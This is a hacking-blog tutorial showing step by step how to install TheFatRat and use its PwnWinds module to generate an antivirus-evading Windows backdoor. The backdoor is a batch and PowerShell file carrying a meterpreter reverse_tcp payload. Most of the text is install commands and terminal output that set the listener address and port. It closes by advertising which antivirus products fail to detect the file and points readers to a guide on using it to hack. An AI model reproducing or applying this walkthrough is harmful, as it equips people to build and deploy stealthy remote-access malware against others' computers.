Sploitech

How To Create A Executable Fud Backdoor Using TheFatRat

The FatRat

A Massive Exploiting Tool

TheFatRat is an exploiting tool that compiles a malware with famous payloads, and then the compiled malware can be executed on Linux, Windows, Mac, and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

Amazing Features !

  • Fully Automating MSFvenom & Metasploit.
  • Local or remote listener Generation.
  • Easily Make Backdoor by category Operating System.
  • Generate payloads in Various formats.
  • Bypass anti-virus backdoors.
  • File pumper that you can use for increasing the size of your files.
  • The ability to detect external IP & Interface address.
  • Automatically creates AutoRun files for USB / CDROM exploitation

Installing TheFatRat On Kali Linux:

Steps To Install TheFatRat On Your Kali: 

  • First clone the files from Github.
  • After cloning enter the directory where the files have been located.
  • To execute the setup file type: chmod +x {File Name} && {./File Name} which means you are converting that file as an executable.
				
					git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh

				
			

Installation depends on your internet speed and the packages which are not installed and needed by TheFatRat.

Troubleshoot on TheFatRat:

chk_tools script to use in case of problems in setup.sh of fatrat this script will check if everything is in the right version to run fatrat and will also provide you a solution for the problem

				
					cd TheFatRat
chmod +x chk_tools 
./chk_tools
				
			
If you are still not able to install TheFatRat please read the full documentation on Github (https://github.com/Screetsec/ TheFatRat).

Step1: Creating Fud Payload Using PwnWinds

Once you have successfully finished installing TheFatRat you can anywhere in terminal type fatrat to execute the application. (It should be run using root access if not then type sudo fatrat)

				
					kali@kali:~$ sudo fatrat
				
			

Now it will check for the internet connection and for the dependencies to run the program. If all these things are good the script will continue.

				
					-       ____
       |    |
       |____|
      _|____|_       _____ _       _____     _   _____     _
       /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_
     .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|
    /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_|
   J  \.|'.\/ \
   | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]
    \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]
    L   /|o'--'\   [--]            Version: 1.9.7           [--]
    |  /\/\/\   \  [--]          Codename: Whistle          [--]
    J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]
    J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]
    |/         /   [--]                                     [--]
      \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--]
   ____)_/\_(___\. [--] .___________________________________[--]
  (___._/  \_.___)'\_.-----------------------------------------/


       [01]  Create Backdoor with msfvenom
       [02]  Create Fud 100% Backdoor with Fudwin 1.0
       [03]  Create Fud Backdoor with Avoid v1.2
       [04]  Create Fud Backdoor with backdoor-factory [embed]
       [05]  Backdooring Original apk [Instagram, Line,etc]
       [06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]
       [07]  Create Backdoor For Office with Microsploit
       [08]  Trojan Debian Package For Remote Acces [Trodebi]
       [09]  Load/Create auto listeners
       [10]  Jump to msfconsole
       [11]  Searchsploit
       [12]  File Pumper [Increase Your Files Size]
       [13]  Configure Default Lhost & Lport
       [14]  Cleanup
       [15]  Help
       [16]  Credits
       [17]  Exit

┌─[TheFatRat]──[~]─[menu]:
└─────► 6
				
			

In this tutorial, we are going to use PwnWinds for creating an executable backdoor. Now we have to select option number 6.

				
					

        [ Select an Option To Begin >>

        ________                 ___       ______       _________       
        ___  __ \__      __________ |     / /__(_)____________  /_______
        __  /_/ /_ | /| / /_  __ \_ | /| / /__  /__  __ \  __  /__  ___/
        _  ____/__ |/ |/ /_  / / /_ |/ |/ / _  / _  / / / /_/ / _(__  ) 
        /_/     ____/|__/ /_/ /_/____/|__/  /_/  /_/ /_/\__,_/  /____/  

                                  ______    
                               .-        -. 
                              /            \         
                             |,  .-.  .-.  ,|      
                             | )(_ /  \_ )( |
                             |/     /\     \|    
                   (@_       <__    ^^    __>        
              _     ) \_______\__|IIIIII|__/____________________ 
             (_)\@8@8{}<________________________________________> 
                    )_/         \ IIIIII /                    
                   (@            --------                      
                            PwnWind Version  v1.5 
                        Pwned Windows with backdoor
                      Author : Edo Maland (Screetsec)
             Powershell Injection attacks on any Windows Platform                  

        [1]  Create a bat file+Powershell (FUD 100%)
        [2]  Create exe file with C# + Powershell (FUD 100%) 
        [3]  Create exe file with apache + Powershell (FUD 100%)
        [4]  Create exe file with C + Powershell (FUD 98 %)                                                                              
        [5]  Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)                                                                   
        [6]  Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)                                                                   
        [7]  Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)                                                              
        [8]  Create Backdoor with C to dll ( custom dll inject )                                                                         
        [9]  Back to Menu                                                                                                                
                                                                                                                                         
 ┌─[TheFatRat]──[~]─[pwnwind]:                                                                                                           
 └─────► 1                                                                                                                               


   Your local IPV4 address is :                                                                                                          
   Your local IPV6 address is :                                                                                                          
   Your public IP address is : 122.161.77.10                                                                                             
   Your Hostname is : abts-north-dynamic-010.77.161.122.airtelbroadband.in                                                               
                                                                                                                                         
  Set LHOST IP: 192.168.159.129                                                                                                          
                                                                                                                                         
  Set LPORT: 8080                                                                                                                        
                                                                                                                                         
  Please enter the base name for output files :Payload                                                                                   


 
                                                                                                                                         
   +-------------------------------------------+                                                                                         
   | [ 1 ] windows/shell_bind_tcp              |                                                                                         
   | [ 2 ] windows/shell/reverse_tcp           |                                                                                         
   | [ 3 ] windows/meterpreter/reverse_tcp     |                                                                                         
   | [ 4 ] windows/meterpreter/reverse_tcp_dns |                                                                                         
   | [ 5 ] windows/meterpreter/reverse_http    |                                                                                         
   | [ 6 ] windows/meterpreter/reverse_https   |                                                                                         
   +-------------------------------------------+                                                                                         
                                                                                                                                         
   Choose Payload :3                                                                                                                     


[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]

 
  Generate Backdoor                                                                                                                      
  +------------++-------------------------++-----------------------+                                                                     
  | Name       ||  Descript               || Your Input                                                                                  
  +------------++-------------------------++-----------------------+                                                                     
  | LHOST      ||  The Listen Address      || 192.168.159.129                                                                             
  | LPORT      ||  The Listen Ports       || 8080                                                                                        
  | OUTPUTNAME ||  The Filename output    || Payload                                                                                     
  | PAYLOAD    ||  Payload To Be Used     || windows/meterpreter/reverse_tcp                                                             
  +------------++-------------------------++-----------------------+                                                                     
                                                                                                                                         
                                                                                                                                         
                                                                                                                                         
                                                                                                                                         
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]

Backdoor Saved To : /home/kali//Payload.bat                                                                                              
                                                                                                                                         
  Press [ENTER] to continue .........                              



				
			

We will be using bat file + Powershell because it is less detectable by antivirus software. Now we have to select option number 1 after this you will be asked to enter your LHOST IP it will be displayed on the local IPV4 address just copy and paste the IP. Now you will be asked to specify the LPORT. I am using 8080 as my lport because many web servers use port 8080. After all the settings you will be asked to give the name of your bat file it can be anything I have used payload. Now you will be asked to select the payload you want to use in your file I am using option number 3. Press enter and your file will be generated and saved to the location which you have specified when installing TheFatRat. If you want to know how to hack using this file check out our article on:

Conclusion

Only 23 out of 60 AV software were able to detect that this is a malicious file. Scanned by Virustotal. This file is not going to work on this AV software:

  • Microsoft
  • Avast
  • McAfee
  • BitDefender
  • AVG
  • Comodo

There are many other antivirus software that flagged this file as malicious.

Liked This Article? Join Our Newsletter.

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.

Share It On:

Share on facebook
Facebook
Share on whatsapp
WhatsApp
Share on reddit
Reddit
Share on telegram
Telegram
Share on email
Email

COMMENTS:

Leave a Reply

Your email address will not be published. Required fields are marked *

You Might Also Like:

Want To Know About Latest Hacking Tricks?

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.